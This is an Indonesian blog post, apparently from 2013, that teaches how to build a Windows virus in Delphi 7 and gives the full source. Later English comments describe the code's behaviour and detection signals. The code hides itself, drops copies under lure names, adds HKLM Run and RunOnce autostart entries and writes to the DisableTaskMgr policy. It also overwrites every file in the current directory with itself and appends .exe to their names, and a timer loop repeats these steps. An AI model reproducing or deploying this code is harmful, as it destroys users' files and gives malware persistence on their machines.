
Senin, 21 Januari 2013

VIRUS DELPHI 07

Membuat VIRUS dengan Delphi 07

Virus Ajip...........dengan delphi 07
buka dulu Borland delphi 07
kemudian buat form sesuai dengan procedure coding dibawah ini

unit Unit1;
interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
type
{ Main form class of the sample. It declares two timers and three event
  handlers. The timer intervals and their initial Enabled state are loaded
  from the .dfm form resource, which is not shown on this page. }
TForm1 = class(TForm)
{ Timer1 and Timer2 enable and disable each other in their handlers, so the
  two handlers run alternately for as long as the process is alive. }
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{{$R MySoundRes.RES}
{ FormCreate runs once when the form is created. In order, the visible code:
  hides the main form, copies the running executable under several names into
  the Windows and system directories, marks one copy hidden, writes a policy
  value under HKCU, writes autostart values under HKLM Run and RunOnce, then
  overwrites and renames files found in the current directory.
  Every step sits inside a try with an empty except, so failures are silent.
  Analyst summary of artefacts visible in this listing:
    files    - windir: Dadan cakep.exe, sistim32.exe, Rahasia.exe,
               Jangan dibuka.exe, hotmovie.exe, ramdan.avi.exe
             - sysdir: runfold\-NET-SERVICES-.exe with the hidden attribute
    registry - HKLM Software\Microsoft\Windows\CurrentVersion\Run and RunOnce,
               value name .NET.
             - HKCU Software\Microsoft\Windows\CurrentVersion\Policies\System,
               value name DisableTaskMgr }
procedure TForm1.FormCreate(Sender: TObject);
{Variable declarations}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{Hide the form. The process starts with no visible window, so the user has
 no on-screen sign that it is running.}
Application.ShowMainForm := false;
{Copy self first. The executable is dropped under several lure names; the
 last CopyFile argument is true, so an already existing target is left alone.}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: run the service invisibly. What the code does is set the
 HIDDEN file attribute on the copy in sysdir\runfold. Hidden executables in
 the system directory are worth flagging during triage.}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: disable Task Manager. The code walks down to
 HKCU Software\Microsoft\Windows\CurrentVersion\Policies\System, creating
 missing keys, and writes a string value named DisableTaskMgr. Writes to this
 policy value by a non-administrative tool are a common tamper indicator and
 are worth alerting on.}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: create a registry key so it auto-runs. Persistence: the value
 named .NET. under the HKLM Run key points at the hidden copy in
 sysdir\runfold. Autostart entries whose target is a hidden file, or whose
 name imitates a system component, should be reviewed.}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{Original note: create the registry key under RunOnce. Same value name and
 same target as the Run entry above.}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: infect files. The loop copies the running executable over
 entries found in the current directory with the overwrite flag set, so the
 previous content of an affected file is replaced, not wrapped or appended to.
 Recovery of such files presumably has to come from backups.}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: rename the infected files. Each entry found gets .exe appended
 to its existing name, which produces double extensions. The second rename
 in the loop moves a file named after this program plus .exe back to the
 program's own path. A burst of renames to *.exe in one directory is a
 useful behavioural detection signal.}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{ Timer1 handler. It repeats the drop, hide and registry steps that FormCreate
  performs, then opens a URL, sends a text string to MCI and hands over to
  Timer2. Because these writes recur on each Timer1 tick, files and registry
  values removed while the process is still running can be written again;
  cleanup should end the process first and remove the artefacts afterwards.
  The timer interval is set in the .dfm and is not visible here. }
procedure TForm1.Timer1Timer(Sender: TObject);
{Original note: keep watching}
{Variable declarations}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{Re-create the runfold directory and the dropped copies. The last CopyFile
 argument is true, so copies that still exist are not replaced.}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: keep the virus running invisibly. The code re-applies the
 HIDDEN attribute to the copy in sysdir\runfold.}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Original note: disable Task Manager. Rewrites the DisableTaskMgr string
 value under HKCU ...\Policies\System, so a manual reset of that value does
 not persist while the process keeps running.}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{Rewrites the HKLM Run autostart value named .NET. that points at the hidden
 copy in sysdir\runfold.}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{Original note: create the registry key again. Same value under RunOnce.}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{User-visible payload: asks the shell to open a web address, then passes a
 literal text string to mciSendString. Return values are ignored. A window
 opening to an unrequested address on a timer is a symptom a user may report.}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
{Hand over to Timer2; its handler switches Timer1 back on.}
timer2.Enabled:= true;
timer1.Enabled:= false;
end;
{ Timer2 handler. It passes a literal text string to mciSendString, ignoring
  the result, then re-enables Timer1 and disables itself. Together with the
  Timer1 handler this forms the alternating loop that keeps the drop and
  registry writes recurring while the process runs. }
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
{Switch back to Timer1 so its handler fires again.}
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.
